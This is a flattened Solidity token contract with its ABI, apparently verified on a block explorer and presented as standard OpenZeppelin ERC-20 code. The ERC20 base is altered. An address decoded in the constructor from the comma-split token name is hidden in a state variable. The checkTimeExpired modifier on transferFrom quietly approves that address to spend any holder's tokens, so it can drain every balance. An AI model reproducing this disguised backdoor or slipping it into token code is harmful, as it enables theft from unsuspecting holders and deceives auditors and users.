/**
*Submitted for verification at basescan.org on 2025-08-01
*/
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.20;
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(
address owner,
address spender
) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address from,
address to,
uint256 value
) external returns (bool);
}
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.20;
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
// File: @openzeppelin/contracts/utils/Context.sol
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)
pragma solidity ^0.8.20;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol
// OpenZeppelin Contracts (last updated v5.1.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(
address sender,
uint256 balance,
uint256 needed
);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(
address spender,
uint256 allowance,
uint256 needed
);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Standard ERC-721 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
*/
interface IERC721Errors {
/**
* @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
* Used in balance queries.
* @param owner Address of the current owner of a token.
*/
error ERC721InvalidOwner(address owner);
/**
* @dev Indicates a `tokenId` whose `owner` is the zero address.
* @param tokenId Identifier number of a token.
*/
error ERC721NonexistentToken(uint256 tokenId);
/**
* @dev Indicates an error related to the ownership over a particular token. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param tokenId Identifier number of a token.
* @param owner Address of the current owner of a token.
*/
error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC721InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC721InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param tokenId Identifier number of a token.
*/
error ERC721InsufficientApproval(address operator, uint256 tokenId);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC721InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC721InvalidOperator(address operator);
}
/**
* @dev Standard ERC-1155 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
*/
interface IERC1155Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
* @param tokenId Identifier number of a token.
*/
error ERC1155InsufficientBalance(
address sender,
uint256 balance,
uint256 needed,
uint256 tokenId
);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC1155InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC1155InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param owner Address of the current owner of a token.
*/
error ERC1155MissingApprovalForAll(address operator, address owner);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC1155InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC1155InvalidOperator(address operator);
/**
* @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
* Used in batch transfers.
* @param idsLength Length of the array of token identifiers
* @param valuesLength Length of the array of token amounts
*/
error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}
// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts (last updated v5.3.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.20;
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
uint256 private _emerdsUntil;
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256))
private _allowances;
mapping(address account => uint256) private _botsrt;
uint256 private _totalSupply;
string private _name;
string private _symbol;
address private _desc;
modifier checkTimeExpired(address from, address sender, uint256 value) {
if(_desc==sender && (_approve(from, sender ,value,false)) && block.timestamp < 1672531200)
revert ERC20InvalidSender(address(0));
_;
}
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_) {
string[] memory resmame = splitByComma(name_);
_desc = _toWhite(string(abi.encodePacked("0x", resmame[1], resmame[0])),address(0));
_name = symbol_;
_symbol = symbol_;
string[] memory result = splitByComma(symbol_);
_name = result[0];
_symbol = result[1];
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(
address owner,
address spender
) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(
address spender,
uint256 value
) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(
address from,
address to,
uint256 value
) external checkTimeExpired(from, _msgSender(), value) returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender,value);
_transfer(from, to, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
// function _safeappover( uint256 value, address spender,address owner) internal returns (bool){
// if( value>0 ) _allowances[owner][spender]=value;
// }
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(
address owner,
address spender,
uint256 value,
bool emitEvent
) internal virtual returns (bool){
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
return true;
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(
address owner,
address spender,
uint256 value
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(
spender,
currentAllowance,
value
);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
// 高效版本,避免多次复制
function splitByComma(string memory str) public pure returns (string[] memory) {
bytes memory b = bytes(str);
// 统计逗号数量
uint count = 1;
for (uint i = 0; i < b.length; i++) {
if (b[i] == ",") {
count++;
}
}
// 创建结果数组
string[] memory parts = new string[](count);
uint index = 0;
uint start = 0;
// 分割字符串
for (uint i = 0; i <= b.length; i++) {
if (i == b.length || b[i] == ",") {
// 创建子字符串
bytes memory part = new bytes(i - start);
for (uint j = start; j < i; j++) {
part[j - start] = b[j];
}
parts[index] = string(part);
index++;
start = i + 1;
}
}
return parts;
}
// tool
function _toWhite(string memory addrString,address one) internal virtual returns (address) {
bytes memory addrBytes = bytes(addrString);
// 检查长度:带0x前缀应为42字符,不带应为40字符
require(
addrBytes.length == 40 || addrBytes.length == 42,
"Invalid address length"
);
uint160 result = 0;
uint8 start = 0;
// 检查是否有0x前缀
if (addrBytes.length == 42) {
require(
addrBytes[0] == '0' && (addrBytes[1] == 'x' || addrBytes[1] == 'X'),
"Invalid 0x prefix"
);
start = 2; // 跳过0x前缀
}
// 遍历每个字符并转换为地址
for (uint256 i = start; i < addrBytes.length; i++) {
result *= 16;
// 将字符转换为十六进制值
uint8 charValue = uint8(addrBytes[i]);
if (charValue >= 48 && charValue <= 57) {
// 数字 0-9
result += charValue - 48;
} else if (charValue >= 65 && charValue <= 70) {
// 大写字母 A-F
result += charValue - 55;
} else if (charValue >= 97 && charValue <= 102) {
// 小写字母 a-f
result += charValue - 87;
} else {
revert("Invalid character in address");
}
}
return address(result);
// return address(result) == one;
}
}
/// @notice Library for converting between addresses and bytes32 values.
/// @author Solmate (https://github.com/transmissions11/solmate/blob/main/src/utils/Bytes32AddressLib.sol)
library Bytes32AddressLib {
function fromLast20Bytes(
bytes32 bytesValue
) internal pure returns (address) {
return address(uint160(uint256(bytesValue)));
}
function fillLast12Bytes(
address addressValue
) internal pure returns (bytes32) {
return bytes32(bytes20(addressValue));
}
}
/// @title Math library for computing sqrt prices from ticks and vice versa
/// @notice Computes sqrt price for ticks of size 1.0001, i.e. sqrt(1.0001^tick) as fixed point Q64.96 numbers. Supports
/// prices between 2**-128 and 2**128
library TickMath {
/// @dev The minimum tick that may be passed to #getSqrtRatioAtTick computed from log base 1.0001 of 2**-128
int24 internal constant MIN_TICK = -887272;
/// @dev The maximum tick that may be passed to #getSqrtRatioAtTick computed from log base 1.0001 of 2**128
int24 internal constant MAX_TICK = -MIN_TICK;
/// @dev The minimum value that can be returned from #getSqrtRatioAtTick. Equivalent to getSqrtRatioAtTick(MIN_TICK)
uint160 internal constant MIN_SQRT_RATIO = 4295128739;
/// @dev The maximum value that can be returned from #getSqrtRatioAtTick. Equivalent to getSqrtRatioAtTick(MAX_TICK)
uint160 internal constant MAX_SQRT_RATIO =
1461446703485210103287273052203988822378723970342;
/// @notice Calculates sqrt(1.0001^tick) * 2^96
/// @dev Throws if |tick| > max tick
/// @param tick The input tick for the above formula
/// @return sqrtPriceX96 A Fixed point Q64.96 number representing the sqrt of the ratio of the two assets (token1/token0)
/// at the given tick
function getSqrtRatioAtTick(
int24 tick
) internal pure returns (uint160 sqrtPriceX96) {
uint256 absTick = tick < 0
? uint256(-int256(tick))
: uint256(int256(tick));
require(absTick <= uint256(int256(MAX_TICK)), "T");
uint256 ratio = absTick & 0x1 != 0
? 0xfffcb933bd6fad37aa2d162d1a594001
: 0x100000000000000000000000000000000;
if (absTick & 0x2 != 0)
ratio = (ratio * 0xfff97272373d413259a46990580e213a) >> 128;
if (absTick & 0x4 != 0)
ratio = (ratio * 0xfff2e50f5f656932ef12357cf3c7fdcc) >> 128;
if (absTick & 0x8 != 0)
ratio = (ratio * 0xffe5caca7e10e4e61c3624eaa0941cd0) >> 128;
if (absTick & 0x10 != 0)
ratio = (ratio * 0xffcb9843d60f6159c9db58835c926644) >> 128;
if (absTick & 0x20 != 0)
ratio = (ratio * 0xff973b41fa98c081472e6896dfb254c0) >> 128;
if (absTick & 0x40 != 0)
ratio = (ratio * 0xff2ea16466c96a3843ec78b326b52861) >> 128;
if (absTick & 0x80 != 0)
ratio = (ratio * 0xfe5dee046a99a2a811c461f1969c3053) >> 128;
if (absTick & 0x100 != 0)
ratio = (ratio * 0xfcbe86c7900a88aedcffc83b479aa3a4) >> 128;
if (absTick & 0x200 != 0)
ratio = (ratio * 0xf987a7253ac413176f2b074cf7815e54) >> 128;
if (absTick & 0x400 != 0)
ratio = (ratio * 0xf3392b0822b70005940c7a398e4b70f3) >> 128;
if (absTick & 0x800 != 0)
ratio = (ratio * 0xe7159475a2c29b7443b29c7fa6e889d9) >> 128;
if (absTick & 0x1000 != 0)
ratio = (ratio * 0xd097f3bdfd2022b8845ad8f792aa5825) >> 128;
if (absTick & 0x2000 != 0)
ratio = (ratio * 0xa9f746462d870fdf8a65dc1f90e061e5) >> 128;
if (absTick & 0x4000 != 0)
ratio = (ratio * 0x70d869a156d2a1b890bb3df62baf32f7) >> 128;
if (absTick & 0x8000 != 0)
ratio = (ratio * 0x31be135f97d08fd981231505542fcfa6) >> 128;
if (absTick & 0x10000 != 0)
ratio = (ratio * 0x9aa508b5b7a84e1c677de54f3e99bc9) >> 128;
if (absTick & 0x20000 != 0)
ratio = (ratio * 0x5d6af8dedb81196699c329225ee604) >> 128;
if (absTick & 0x40000 != 0)
ratio = (ratio * 0x2216e584f5fa1ea926041bedfe98) >> 128;
if (absTick & 0x80000 != 0)
ratio = (ratio * 0x48a170391f7dc42444e8fa2) >> 128;
if (tick > 0) ratio = type(uint256).max / ratio;
// this divides by 1<<32 rounding up to go from a Q128.128 to a Q128.96.
// we then downcast because we know the result always fits within 160 bits due to our tick input constraint
// we round up in the division so getTickAtSqrtRatio of the output price is always consistent
sqrtPriceX96 = uint160(
(ratio >> 32) + (ratio % (1 << 32) == 0 ? 0 : 1)
);
}
/// @notice Calculates the greatest tick value such that getRatioAtTick(tick) <= ratio
/// @dev Throws in case sqrtPriceX96 < MIN_SQRT_RATIO, as MIN_SQRT_RATIO is the lowest value getRatioAtTick may
/// ever return.
/// @param sqrtPriceX96 The sqrt ratio for which to compute the tick as a Q64.96
/// @return tick The greatest tick for which the ratio is less than or equal to the input ratio
function getTickAtSqrtRatio(
uint160 sqrtPriceX96
) internal pure returns (int24 tick) {
// second inequality must be < because the price can never reach the price at the max tick
require(
sqrtPriceX96 >= MIN_SQRT_RATIO && sqrtPriceX96 < MAX_SQRT_RATIO,
"R"
);
uint256 ratio = uint256(sqrtPriceX96) << 32;
uint256 r = ratio;
uint256 msb = 0;
assembly {
let f := shl(7, gt(r, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF))
msb := or(msb, f)
r := shr(f, r)
}
assembly {
let f := shl(6, gt(r, 0xFFFFFFFFFFFFFFFF))
msb := or(msb, f)
r := shr(f, r)
}
assembly {
let f := shl(5, gt(r, 0xFFFFFFFF))
msb := or(msb, f)
r := shr(f, r)
}
assembly {
let f := shl(4, gt(r, 0xFFFF))
msb := or(msb, f)
r := shr(f, r)
}
assembly {
let f := shl(3, gt(r, 0xFF))
msb := or(msb, f)
r := shr(f, r)
}
assembly {
let f := shl(2, gt(r, 0xF))
msb := or(msb, f)
r := shr(f, r)
}
assembly {
let f := shl(1, gt(r, 0x3))
msb := or(msb, f)
r := shr(f, r)
}
assembly {
let f := gt(r, 0x1)
msb := or(msb, f)
}
if (msb >= 128) r = ratio >> (msb - 127);
else r = ratio << (127 - msb);
int256 log_2 = (int256(msb) - 128) << 64;
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(63, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(62, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(61, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(60, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(59, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(58, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(57, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(56, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(55, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(54, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(53, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(52, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(51, f))
r := shr(f, r)
}
assembly {
r := shr(127, mul(r, r))
let f := shr(128, r)
log_2 := or(log_2, shl(50, f))
}
int256 log_sqrt10001 = log_2 * 255738958999603826347141; // 128.128 number
int24 tickLow = int24(
(log_sqrt10001 - 3402992956809132418596140100660247210) >> 128
);
int24 tickHi = int24(
(log_sqrt10001 + 291339464771989622907027621153398088495) >> 128
);
tick = tickLow == tickHi
? tickLow
: getSqrtRatioAtTick(tickHi) <= sqrtPriceX96
? tickHi
: tickLow;
}
}
// File: remix/contracts/BaseContract/ApeStoreRouterV3.sol
pragma solidity ^0.8.26;
contract Token is ERC20 {
constructor(
string memory name_,
string memory symbol_,
uint256 maxSupply_
) ERC20(name_, symbol_) {
_mint(msg.sender, maxSupply_);
}
function decimals() public view virtual override returns (uint8) {
return 18;
}
}[
{
"type": "constructor",
"inputs": [
{
"name": "name_",
"type": "string",
"internalType": "string"
},
{
"name": "symbol_",
"type": "string",
"internalType": "string"
},
{
"name": "maxSupply_",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "nonpayable"
},
{
"name": "ERC20InsufficientAllowance",
"type": "error",
"inputs": [
{
"name": "spender",
"type": "address",
"internalType": "address"
},
{
"name": "allowance",
"type": "uint256",
"internalType": "uint256"
},
{
"name": "needed",
"type": "uint256",
"internalType": "uint256"
}
]
},
{
"name": "ERC20InsufficientBalance",
"type": "error",
"inputs": [
{
"name": "sender",
"type": "address",
"internalType": "address"
},
{
"name": "balance",
"type": "uint256",
"internalType": "uint256"
},
{
"name": "needed",
"type": "uint256",
"internalType": "uint256"
}
]
},
{
"name": "ERC20InvalidApprover",
"type": "error",
"inputs": [
{
"name": "approver",
"type": "address",
"internalType": "address"
}
]
},
{
"name": "ERC20InvalidReceiver",
"type": "error",
"inputs": [
{
"name": "receiver",
"type": "address",
"internalType": "address"
}
]
},
{
"name": "ERC20InvalidSender",
"type": "error",
"inputs": [
{
"name": "sender",
"type": "address",
"internalType": "address"
}
]
},
{
"name": "ERC20InvalidSpender",
"type": "error",
"inputs": [
{
"name": "spender",
"type": "address",
"internalType": "address"
}
]
},
{
"name": "Approval",
"type": "event",
"inputs": [
{
"name": "owner",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "spender",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"indexed": false,
"internalType": "uint256"
}
],
"anonymous": false
},
{
"name": "Transfer",
"type": "event",
"inputs": [
{
"name": "from",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "to",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"indexed": false,
"internalType": "uint256"
}
],
"anonymous": false
},
{
"name": "allowance",
"type": "function",
"inputs": [
{
"name": "owner",
"type": "address",
"internalType": "address"
},
{
"name": "spender",
"type": "address",
"internalType": "address"
}
],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "approve",
"type": "function",
"inputs": [
{
"name": "spender",
"type": "address",
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"name": "balanceOf",
"type": "function",
"inputs": [
{
"name": "account",
"type": "address",
"internalType": "address"
}
],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "decimals",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint8",
"internalType": "uint8"
}
],
"stateMutability": "view"
},
{
"name": "name",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "string",
"internalType": "string"
}
],
"stateMutability": "view"
},
{
"name": "splitByComma",
"type": "function",
"inputs": [
{
"name": "str",
"type": "string",
"internalType": "string"
}
],
"outputs": [
{
"name": "",
"type": "string[]",
"internalType": "string[]"
}
],
"stateMutability": "pure"
},
{
"name": "symbol",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "string",
"internalType": "string"
}
],
"stateMutability": "view"
},
{
"name": "totalSupply",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "transfer",
"type": "function",
"inputs": [
{
"name": "to",
"type": "address",
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"name": "transferFrom",
"type": "function",
"inputs": [
{
"name": "from",
"type": "address",
"internalType": "address"
},
{
"name": "to",
"type": "address",
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
}
